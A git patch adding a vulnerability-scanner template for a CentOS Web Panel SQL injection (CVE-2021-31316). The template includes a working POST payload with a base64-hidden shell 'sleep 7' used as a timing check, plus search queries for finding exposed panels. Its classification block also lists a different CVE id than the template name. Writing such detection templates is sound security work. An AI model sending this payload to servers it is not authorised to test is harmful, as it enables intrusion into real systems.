From 73fdab50e004a2355ad8ef31d0c11d5c88e0fbf9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 16 Jan 2025 14:59:32 +0530 Subject: [PATCH] Create CVE-2021-31316.yaml --- http/cves/2021/CVE-2021-31316.yaml | 53 ++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2021/CVE-2021-31316.yaml diff --git a/http/cves/2021/CVE-2021-31316.yaml b/http/cves/2021/CVE-2021-31316.yaml new file mode 100644 index 00000000000..68bfaafd4c0 --- /dev/null +++ b/http/cves/2021/CVE-2021-31316.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-31316 + +info: + name: CentOS Web Panel - SQL Injection + author: ritikchaddha + severity: critical + description: | + The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter. + reference: + - https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-31316 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31324 + cwe-id: CWE-89 + cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:* + metadata: + vendor: control-webpanel + product: webpanel + shodan-query: title:"Login | Control WebPanel" + fofa-query: title="Login | Control WebPanel" + tags: cve,cve2021,centos,cwpsrv,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(header, "cwpsrv")' + internal: true + + - raw: + - | + POST /login/index.php?acc=newpass HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a'%20UNION%20SELECT'a'%2c'b'%2c'c'%2c'YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO3NsZWVwIDc7I2B8fGF8fGJ8fGN8fGQ%3d'%2c'e'%2c'f'-- p + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200' + - 'contains(response, "Control WebPanel")' + condition: and